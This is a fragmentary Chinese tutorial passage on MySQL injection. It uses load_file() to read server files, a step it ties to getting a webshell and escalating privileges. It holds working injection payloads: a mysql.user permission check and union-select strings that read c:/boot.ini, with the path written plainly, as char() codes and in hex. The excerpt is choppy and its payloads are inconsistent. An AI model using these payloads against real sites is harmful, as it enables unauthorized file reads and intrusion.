前言
在Msql注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件
而load_file函数只有在满足两个条件的情况下才可以使用:
1、文件权限...and (select count(*) from mysql.user)>0 如果结果返回正常,说明具有读写权限
and (select count(*) from mysql.user)>0 返回错误...可读)
此时,我们构造$id为:
-1 union select 1,1,1,1,load_file('c:/boot.ini')
我们的查询语句就变成:
select * from article where...我们的查询语句就变成:
select * from article where articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105...:
select * from article where articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
在实际应用中